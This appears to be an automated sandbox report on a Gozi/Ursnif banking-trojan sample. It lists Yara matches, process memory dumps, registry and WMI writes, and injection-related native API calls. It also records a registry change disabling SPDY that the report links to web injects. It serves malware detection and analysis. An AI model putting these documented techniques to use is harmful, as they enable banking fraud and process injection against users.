Source: Yara match	File source: Process Memory Space: control.exe PID: 5676, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 4364, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 4084, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 4176, type: MEMORYSTR
Source: Yara match	File source: 8.3.RegAsm.exe.330a4a0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.RegAsm.exe.330a4a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.RegAsm.exe.33b8f40.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.RegAsm.exe.33894a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000024.00000000.539555209.0000020FDEA80000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002D.00000000.652250920.000001EAE4570000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000000.568184534.000001B920020000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000000.609566601.00000163C5170000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.468518313.0000000000E50000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.523377381.000000000308F000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000000.563482706.000001B920020000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000000.615563963.00000163C5170000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002D.00000000.655957739.000001EAE4570000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002D.00000000.648045274.000001EAE4570000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.470699283.0000000000E50000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000000.537792307.0000020FDEA80000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000000.572793373.000001B920020000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.398744797.0000000003389000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.472358807.0000000000E50000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000000.535827896.0000020FDEA80000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000002.824135960.00000163C5171000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002D.00000002.819337222.000001EAE4571000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000000.621795530.00000163C5170000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.542236121.0000000000E51000.00000020.00020000.sdmp, type: MEMORY

E-Banking Fraud:

Yara detected Ursnif

Source: Yara match	File source: 0000001C.00000003.532875532.000001DC0EF2C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.392490032.0000000003408000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000002.826395409.00000163C5A02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000002F.00000003.672226246.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002F.00000003.671882459.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.392591901.0000000003408000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.473440748.000001DC0EF2C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002F.00000003.671987567.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.392517903.0000000003408000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.541235990.0000020FDF04C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002F.00000003.672047552.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.392607938.0000000003408000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002F.00000003.671936053.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.473486452.000001DC0EF2C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.540930276.0000020FDF04C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.457301811.00000000043A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.392570642.0000000003408000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002F.00000003.672143247.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.473394409.000001DC0EF2C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.541170125.0000020FDF04C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.473504593.000001DC0EF2C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.825382176.000001B91FF02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.405030349.000000000320C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.392542209.0000000003408000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.395416668.0000000003408000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002F.00000003.672170468.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002F.00000002.673705435.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.543904492.0000020FDF04C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 5696, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: control.exe PID: 5676, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 4364, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 4084, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 4176, type: MEMORYSTR
Source: Yara match	File source: 8.3.RegAsm.exe.330a4a0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.RegAsm.exe.330a4a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.RegAsm.exe.33b8f40.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.RegAsm.exe.33894a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000024.00000000.539555209.0000020FDEA80000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002D.00000000.652250920.000001EAE4570000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000000.568184534.000001B920020000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000000.609566601.00000163C5170000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.468518313.0000000000E50000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.523377381.000000000308F000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000000.563482706.000001B920020000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000000.615563963.00000163C5170000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002D.00000000.655957739.000001EAE4570000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002D.00000000.648045274.000001EAE4570000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.470699283.0000000000E50000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000000.537792307.0000020FDEA80000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000000.572793373.000001B920020000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.398744797.0000000003389000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.472358807.0000000000E50000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000000.535827896.0000020FDEA80000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000002.824135960.00000163C5171000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002D.00000002.819337222.000001EAE4571000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000000.621795530.00000163C5170000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.542236121.0000000000E51000.00000020.00020000.sdmp, type: MEMORY

Disables SPDY (HTTP compression, likely to perform web injects)

Source: C:\Windows\explorer.exe

Registry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

8_2_010A7479

System Summary:

Writes or reads registry keys via WMI

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Writes registry values via WMI

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Detected potential crypto function

Source: C:\Users\user\Desktop\gozi.exe	Code function: 2_2_0304C124	2_2_0304C124
Source: C:\Users\user\Desktop\gozi.exe	Code function: 2_2_0304E56A	2_2_0304E56A
Source: C:\Users\user\Desktop\gozi.exe	Code function: 2_2_0304E570	2_2_0304E570
Source: C:\Users\user\Desktop\gozi.exe	Code function: 2_2_07C27060	2_2_07C27060
Source: C:\Users\user\Desktop\gozi.exe	Code function: 2_2_07C26030	2_2_07C26030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_010A7F60	8_2_010A7F60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_010A6B67	8_2_010A6B67
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_010A6DD3	8_2_010A6DD3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_03F163BC	8_2_03F163BC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_03F1A241	8_2_03F1A241
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_03F1F1EE	8_2_03F1F1EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_03F178F1	8_2_03F178F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_03F0C086	8_2_03F0C086
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_03F0504A	8_2_03F0504A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_03F1CF97	8_2_03F1CF97
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_03F095FE	8_2_03F095FE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_03F09D64	8_2_03F09D64
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_03F034DC	8_2_03F034DC
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E7AB44	28_2_00E7AB44
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E7B58C	28_2_00E7B58C
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E686D0	28_2_00E686D0
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E640E8	28_2_00E640E8
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E568FC	28_2_00E568FC
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E54080	28_2_00E54080
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E53890	28_2_00E53890
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E79858	28_2_00E79858
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E68024	28_2_00E68024
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E78820	28_2_00E78820
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E65828	28_2_00E65828
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E62804	28_2_00E62804
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E6B008	28_2_00E6B008
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E6A808	28_2_00E6A808
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E531D4	28_2_00E531D4
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E66190	28_2_00E66190
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E6194B	28_2_00E6194B
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E5B154	28_2_00E5B154
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E75954	28_2_00E75954
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E652CC	28_2_00E652CC
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E512BC	28_2_00E512BC
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E67BFC	28_2_00E67BFC
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E53BA4	28_2_00E53BA4
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E72BA0	28_2_00E72BA0
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E72330	28_2_00E72330
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E5DCA8	28_2_00E5DCA8
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E6CCA8	28_2_00E6CCA8
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E644B4	28_2_00E644B4
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E5C49C	28_2_00E5C49C
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E6BC10	28_2_00E6BC10
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E59DF0	28_2_00E59DF0
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E78DA0	28_2_00E78DA0
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E7C588	28_2_00E7C588
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E77D6C	28_2_00E77D6C
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E60544	28_2_00E60544
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E74530	28_2_00E74530
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E6751C	28_2_00E6751C
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E5A6D0	28_2_00E5A6D0
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E77EA0	28_2_00E77EA0
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E73E2C	28_2_00E73E2C
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E61618	28_2_00E61618
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E737D0	28_2_00E737D0
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E78FA8	28_2_00E78FA8
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E57F64	28_2_00E57F64
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E5CF44	28_2_00E5CF44
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E69740	28_2_00E69740
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E6FF4C	28_2_00E6FF4C
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEA986D0	36_2_0000020FDEA986D0
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEAAAB44	36_2_0000020FDEAAAB44
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEA8A6D0	36_2_0000020FDEA8A6D0
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEA812BC	36_2_0000020FDEA812BC
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEA952CC	36_2_0000020FDEA952CC
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEAA7EA0	36_2_0000020FDEAA7EA0
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEAA37D0	36_2_0000020FDEAA37D0
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEA9BC10	36_2_0000020FDEA9BC10
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEA95828	36_2_0000020FDEA95828
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEAA8820	36_2_0000020FDEAA8820
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEA98024	36_2_0000020FDEA98024
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEA97BFC	36_2_0000020FDEA97BFC
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEA9B008	36_2_0000020FDEA9B008
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEA9A808	36_2_0000020FDEA9A808
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEA92804	36_2_0000020FDEA92804
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEA87F64	36_2_0000020FDEA87F64
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEAA2330	36_2_0000020FDEAA2330
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEA9FF4C	36_2_0000020FDEA9FF4C
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEA99740	36_2_0000020FDEA99740
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEA8CF44	36_2_0000020FDEA8CF44
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEAA8FA8	36_2_0000020FDEAA8FA8
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEAA2BA0	36_2_0000020FDEAA2BA0
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEA83BA4	36_2_0000020FDEA83BA4
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEA940E8	36_2_0000020FDEA940E8
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEA944B4	36_2_0000020FDEA944B4
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEA9751C	36_2_0000020FDEA9751C
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEA868FC	36_2_0000020FDEA868FC
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEAA9858	36_2_0000020FDEAA9858
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEA8C49C	36_2_0000020FDEA8C49C
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEA83890	36_2_0000020FDEA83890
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEA8DCA8	36_2_0000020FDEA8DCA8
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEA9CCA8	36_2_0000020FDEA9CCA8
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEA84080	36_2_0000020FDEA84080
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEA831D4	36_2_0000020FDEA831D4
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEA91618	36_2_0000020FDEA91618
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEAA3E2C	36_2_0000020FDEAA3E2C
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEA89DF0	36_2_0000020FDEA89DF0
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEA8B154	36_2_0000020FDEA8B154
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEAA5954	36_2_0000020FDEAA5954
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEAA7D6C	36_2_0000020FDEAA7D6C
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEAA4530	36_2_0000020FDEAA4530
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEA9194B	36_2_0000020FDEA9194B
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEA90544	36_2_0000020FDEA90544
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEA96190	36_2_0000020FDEA96190
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEAA8DA0	36_2_0000020FDEAA8DA0
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEAAC588	36_2_0000020FDEAAC588
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEAAB58C	36_2_0000020FDEAAB58C
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 47_2_030463BC	47_2_030463BC
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 47_2_0304A241	47_2_0304A241
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 47_2_0304F1EE	47_2_0304F1EE
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 47_2_0303504A	47_2_0303504A
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 47_2_0303C086	47_2_0303C086
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 47_2_030478F1	47_2_030478F1
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 47_2_0304CF97	47_2_0304CF97
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 47_2_03039D64	47_2_03039D64
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 47_2_030395FE	47_2_030395FE
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 47_2_03055430	47_2_03055430
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 47_2_030334DC	47_2_030334DC

Contains functionality to launch a process as a different user

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 8_2_03F0E6B9 CreateProcessAsUserA,

8_2_03F0E6B9

Searches for the Microsoft Outlook file path

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Jump to behavior

Tries to load missing DLLs

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Section loaded: sfc.dll

Jump to behavior

Contains functionality to call native functions

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_0040140F NtQuerySystemInformation,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,CreateThread,QueueUserAPC,CloseHandle,GetLastError,TerminateThread,CloseHandle,SetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,	8_2_0040140F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_0040182F GetProcAddress,NtCreateSection,memset,	8_2_0040182F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_00401ABC NtMapViewOfSection,	8_2_00401ABC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_010A231E NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,	8_2_010A231E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_010A5D85 GetProcAddress,NtCreateSection,memset,	8_2_010A5D85
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_010A60A0 NtMapViewOfSection,	8_2_010A60A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_010A8185 NtQueryVirtualMemory,	8_2_010A8185
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_03F1B38D memcpy,memcpy,memcpy,NtUnmapViewOfSection,memset,	8_2_03F1B38D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_03F0D317 NtMapViewOfSection,	8_2_03F0D317
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_03F21AE3 RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA,	8_2_03F21AE3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_03F0D274 NtQueryInformationProcess,	8_2_03F0D274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_03F229E0 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,	8_2_03F229E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_03F0317C NtAllocateVirtualMemory,NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError,	8_2_03F0317C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_03F0696A GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA,	8_2_03F0696A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_03F12931 NtWriteVirtualMemory,NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError,	8_2_03F12931
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_03F076E3 memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64,	8_2_03F076E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_03F1CEED GetProcAddress,NtCreateSection,memset,	8_2_03F1CEED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_03F17523 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread,	8_2_03F17523
